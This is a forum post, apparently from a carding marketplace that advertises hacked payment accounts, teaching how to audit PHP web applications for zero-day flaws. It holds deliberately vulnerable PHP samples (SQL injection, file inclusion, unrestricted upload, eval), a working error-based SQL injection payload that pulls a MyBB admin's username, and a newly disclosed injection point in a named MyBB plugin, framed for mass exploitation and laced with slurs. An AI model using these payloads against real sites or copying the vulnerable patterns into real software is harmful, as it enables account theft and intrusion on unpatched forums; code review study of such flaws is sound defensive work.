We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
PHP Audit - The art of finding 0days in webapps

#1
0x01 - Introduction

[+] Who is this tutorial for?

Before we start I just want to state that I assume you have basic understanding about PHP, MySQL and some common vulnerabilities and how they work.
You don't have to be a professional programmer, but you need to be able to read and understand PHP code.

If you feel that you need to learn some more before getting in to this tutorial I'm going to redirect you to some tutorials below:

PHP tutorial:

https://php.net/manual/en/tutorial.php


MySQL tutorial:

https://dev.mysql.com/doc/refman/5.0/en/tutorial.html


Vulnerabilities wiki:

https://www.owasp.org/index.php/Category:Attack


[+] Who am I?

Nobody. I don't take any responsibilities for your actions, if you find your ass in jail after exploiting 8000 vulnerable Wordpress blogs don't blame me for teaching you.
But if you have any questions feel free to hit me up with a mail to join7 [+at+] riseup.net

0x02 - Setting up an Audit Environment

[+] Why use an Audit Environment?

You could just download the code you wish to audit, open it in your systems default text editor and start looking for vulnerabilities.
This is not preferable since there are a very high chance of you missing things and it will surely take a lot more time than by using an Audit Environment.

[+] Web server

We want to set up a Web Server were we can upload and test PHP applications.
If you don't have any experience with hosting you might want to have a look at XAMPP:

https://www.apachefriends.org/en/xampp.html


If you wish to set it up on your own you should install PHP with MySQL.
Additional things as phpmyadmin and MySQL managers are of course useful too.

I'm not going to go into how to set up an Web Server, just google for it you're having problems.

Note: Since you're going to test possible vulnerable code on this web server I suggest you only use it on trusted networks and NEVER on a host that's public for the rest of the internet thugs out there.

[+] What are we auditing?

Now when we have our server set up we need to install additional stuff like WordPress, Joomla, MyBB or similar depending on what you're going to audit.
If you're going for a standalone CMS or just a PHP application you will of course not need any of the above but you'll probably some time in your career step into a WordPress blog or a MyBB forum.
Here are download links and some information on how to install them:

MyBB



Download: https://www.mybb.com/downloads
Installing Guide: https://docs.mybb.com/Installing.html

Wordpress



Download: https://wordpress.org/download/
Installing Guide: https://codex.wordpre...lling_WordPress

Joomla



Download: https://www.joomla.org/download.html
Installing Guide: https://www.joomla.or...ng-started.html

SMF



Download: https://download.simplemachines.org/
Installing Guide: https://wiki.simplema.../smf/Installing

The list can go on...

0x03 - What to look for

[+] User input:

Most vulnerabilities are possible because the programmer forgets (or uses improper) Input Validation.
This true for SQL Injection, Cross-Site Scripting, File Inclusion, Server Side Include, Code Injection and File Upload vulnerabilities and a lot more.


[-] $_GET

Quote
An associative array of variables passed to the current script via the URL parameters.

https://php.net/manual/en/reserved.variables.get.php


[-] $_POST

Quote
An associative array of variables passed to the current script via the HTTP POST method.

https://php.net/manual/en/reserved.variables.post.php


[-] $_REQUEST

Quote
An associative array that by default contains the contents of $_GET, $_POST and $_COOKIE.

https://php.net/manual/en/reserved.varia...equest.php


[-] $_COOKIE

Quote
An associative array of variables passed to the current script via HTTP Cookies.

https://php.net/manual/en/reserved.varia...ookies.php


[-] $_SERVER


$_SERVER -- $HTTP_SERVER_VARS [deprecated] — Server and execution environment information

https://php.net/manual/en/reserved.variables.server.php


[-] $_FILES


An associative array of items uploaded to the current script via the HTTP POST method.

https://php.net/manual/en/reserved.variables.files.php


[+] Possible vulnerable functions:

[-] SQL Injection:

Vulnerable Example:

Code:
$id = $_GET['id'];
$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );

    mysql_*
    $db->* (For MyBB, look here for more info: https://docs.mybb.com...ns-Globals.html & https://docs.mybb.com...se_Methods.html )
    $wpdb->* (For WordPress - Look here for more info: https://codex.wordpre..._Reference/wpdb )

There are alot of possibly vulnerables mysql_* functions.
Take a look at this reference for more information about MySQL functions:

https://se1.php.net/manual/en/ref.mysql.php


Some common functions that is possibly vulnerable:

Code:
mysql_db_query — Selects a database and executes a query on it
    mysql_fetch_array — Fetch a result row as an associative array, a numeric array, or both
    mysql_fetch_field — Get column information from a result and return as an object
    mysql_fetch_row — Get a result row as an enumerated array
    mysql_num_rows — Get number of rows in result
    mysql_result — Get result data

[-] File Inclusion:

Vulnerable Example:

Code:
<?php
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>


    include()
    require()

If the application doesn't restrict how you include files you can read local files and possibly execute files from a remote server (if allow_url_fopen is enabled).

[-] Upload:

Code:
<?php
$target_path = "uploads/";
$target_path = $target_path . basename($_FILES['uploadedfile']['name']);
if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file " . basename($_FILES['uploadedfile']['name']) . " has been uploaded";
} else {
echo "There was an error uploading the file, please try again!";
}
?>

$_FILES[]

If the application does not restrict what and how files are uploaded, you can upload and execute on the server.

[-] Code Execution:

Code:
<?php
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
?>

    passthru()
    system()
    eval()
    exec()[c/ode]

0x04 - Useful tools, scripts and techniques

[+] Text Editors

Sublime Text 2 is one of my favourite Text Editors out there.
It functionalities includes, but are not limited to syntax highlighting, opening directories as 'Projects' (Very useful) and a nice search function.
If you don't like it or have another one you like better, feel free to use it instead.

[+] grep


grep is a command-line utility for searching plain-text data sets for lines matching a regular expression. Grep was originally developed for the Unix operating system, but is available today for all Unix-like systems. Its name comes from the ed command g/re/p (global / regular expression / print).

grep is a very useful tool when it comes to auditing webapps.
Let's say we have the following code at app.php:

[code]<?php
$header = $_GET['header'];
if(isset($header))
{
include("headers/$header");
}
else
{
include("headers/standard.php");
}

$id = $_GET['id'];
$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );
?>


We could use a command like:

$ grep _GET app.php

Output:

$header = $_GET['header'];
$id = $_GET['id'];




Finding mysql_* functions:

grep mysql_ app.php

Output:

$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );




Finding include() function:

grep include app.php

Output:

include("headers/$header");
include("headers/standard.php");



Now let's say we have 3 PHP applications in a folder and we wish to search for the include function in all of them, then we could do something like this:

grep include *.php

Output:

Code:
app2.php: include("headers/$header");
app2.php: include("headers/standard.php");
app3.php: include("headers/$header");
app3.php: include("headers/standard.php");
app.php: include("headers/$header");
app.php: include("headers/standard.php");




If we wish to output the line number we can use the -n argument like this:

grep include *.php -n

Output:

Code:
app2.php:5: include("headers/$header");
app2.php:9: include("headers/standard.php");
app3.php:5: include("headers/$header");
app3.php:9: include("headers/standard.php");
app.php:5: include("headers/$header");
app.php:9: include("headers/standard.php");


Now we wish to check if the words 'SELECT' and 'FROM' can be found:

grep 'SELECT\|FROM' app.php -n

Output:

13:$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );




If we want to match a string and ignore case sensitivity we use the -i argument:

grep 'sEleCt\|FroM' app.php -n -i

output:

13:$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );




[+] Automated tools and why you shouldn't use them

They suck.
Most of them use regex and pattern matching but they miss the logical understanding of an application.
You'll do just fine with a good text editor and grep.


0x05 - Let's Audit - Real world example

We're going to take a look at a real world example, a public exploit, and see if we can find the vulnerabilities:

[+] MyBB DyMy User Agent SQL Injection

https://www.exploit-db.com/exploits/23359/


We'll download the vulnerable application and place it into our plugins folder.
The first thing we do is to open it in our Text Editor:

Posted Image

We'll now start out with some basic searching for possible vulnerable functions and similar stuff:

Code:
grep "\$_GET" dymy_ua.php -i -n
grep "\$_GET" dymy_ua.php -i -n
grep "mysql_" dymy_ua.php -i -n
grep "include" dymy_ua.php -i -n

Output:

Nothing useful




Why doesn't it find anything? Are we doing something wrong? The answer is in the source code, let's take a look:

Code:
function dymy_ua_install()
{
global $db;

$db->write_query("ALTER TABLE ".TABLE_PREFIX."posts ADD `useragent` VARCHAR(255)");
}




So when we audit MyBB Plugins we need to change our audit methods a bit.
We're going to search for $db->*, since that is used in MyBB Plugins for Database interactions.
Let's go back to the terminal and test some new stuff.

Code:
joinse7en@box /v/w/m/i/plugins> grep "\$db" dymy_ua.php -i -n

56: global $db;
58: $db->write_query("ALTER TABLE ".TABLE_PREFIX."posts ADD `useragent` VARCHAR(255)");
63: global $db;
65: if($db->field_exists("useragent", "posts"))
75: global $db;
77: $db->delete_query("templategroups", "title='DyMy User Agent Templates'");
78: $db->write_query("ALTER TABLE ".TABLE_PREFIX."posts DROP `useragent`");
83: global $db;
85: $q = $db->simple_select("templategroups", "COUNT(*) as count", "title = 'DyMy User Agent'");
86: $c = $db->fetch_field($q, "count");
87: $db->free_result($q);
95: $db->insert_query("templategroups", $ins);
101: "template" => $db->escape_string(' <img src="images/useragent/os/{$os}.png" alt="{$os}" title="{$os_name}">'),
106: $db->insert_query("templates", $ins);
111: "template" => $db->escape_string(' <img src="images/useragent/browser/{$browser}.png" alt="{$browser}" title="{$browser_name}">'),
116: $db->insert_query("templates", $ins);
125: global $db;
127: $db->delete_query("templates", "title IN('DyMyUserAgent_Postbit_OS', 'DyMyUserAgent_Postbit_Browser') AND sid='-2'");


Since this isn't much we can tamper with, we'll go to line 127 and see what's up:

Code:
function dymy_ua_deactivate()
{
global $db;

$db->delete_query("templates", "title IN('DyMyUserAgent_Postbit_OS', 'DyMyUserAgent_Postbit_Browser') AND sid='-2'"); // Line 27

require_once MYBB_ROOT."/inc/adminfunctions_templates.php";
find_replace_templatesets('postbit',"#".preg_quote('{$post[\'icon_browser\']}{$post[\'icon_os\']}')."#",'',0);
find_replace_templatesets('postbit_classic',"#".preg_quote('{$post[\'icon_browser\']}{$post[\'icon_os\']}</td>')."#",'</td>',0);
}

function dymy_ua_dh_post_insert(&$data)
{
$useragent = $_SERVER ? $_SERVER['HTTP_USER_AGENT'] : $HTTP_SERVER_VARS['HTTP_USER_AGENT'];
$data->post_insert_data['useragent'] = $useragent;
$data->post_update_data['useragent'] = $useragent;
}

function dymy_ua_postbit(&$post)
{
global $templates;

if(isset($post['browser']) && isset($post['system']) && !empty($post['browser']) && !empty($post['system']) && empty($post['useragent']))
{
$os = str_ireplace("icon_", "", $post['system']);
$browser = str_ireplace("icon_", "", $post['browser']);
$browser = preg_replace("#^linux([a-z])#si", "$1", $browser);
}
...

In this we notice something very nice, take a look at this:

Code:
function dymy_ua_dh_post_insert(&$data)
{
$useragent = $_SERVER ? $_SERVER['HTTP_USER_AGENT'] : $HTTP_SERVER_VARS['HTTP_USER_AGENT'];
$data->post_insert_data['useragent'] = $useragent;
$data->post_update_data['useragent'] = $useragent;
}


We see here that the application inserts the user_agent without any kind of sanitization.
Let's fire up our MyBB forum on our localhost and try this shit out.

Activate the Plugin in your Admin Panel and then go to a thread and post something with Live HTTP Headers running.
We'll see this next to our post:


So now, we'll try some basic test to see if the SQL Injection vulnerability actually exists:


Ah, wonderful!
Now we'll play around with it until we get a nice query to inject.
I'm not going to teach you SQL Injection, that's your job.
After some testing and we'll come out with this query:

Code:
' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)B)); #




0x06 - Publish of a new 0day: MyFlags MyBB plugins SQL Injection (Merry Christmas faggots :3)

Before I leave you to your Auditing I'm going to publish a new 0day.
The SQL Injection vulnerability exists in the MyBB Plugin HM_My Country Flags:

https://mods.mybb.com/view/hm-my-country-flags


When this plugins is activated a user can go to his Control Panel and see this:
Posted Image

Whenever the user now posts the Nationalidad will show up next to his posts:
Posted Image

Start Live HTTP Headers and press the country, in HTTP Live Headers, copy the URL ('localhost/mybb/misc.php?action=hmflags&cnam=Belgium&pf=5') and paste this into a new tab.

Now put a ' after the country:

https://localhost/mybb/misc.php?action=hmflags&cnam=Belgium'&pf=5

Output:

MyBB has experienced an internal SQL error and cannot continue.

Code:
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Belgium''' at line 1
Query:
SELECT * FROM mybb_users u LEFT JOIN mybb_usergroups g ON (u.usergroup=g.gid) LEFT JOIN mybb_userfields f ON (u.uid=f.ufid) WHERE fid5='Belgium'
Reply
Paid adv. expire in 47 days
CLICK to buy Advertisement !

    Verified & Trusted HACKED Payza, PayPal, Ukash, Ucard, EgoPay, Skrill - TRANSFER [Escrow accepted]




Forum Jump: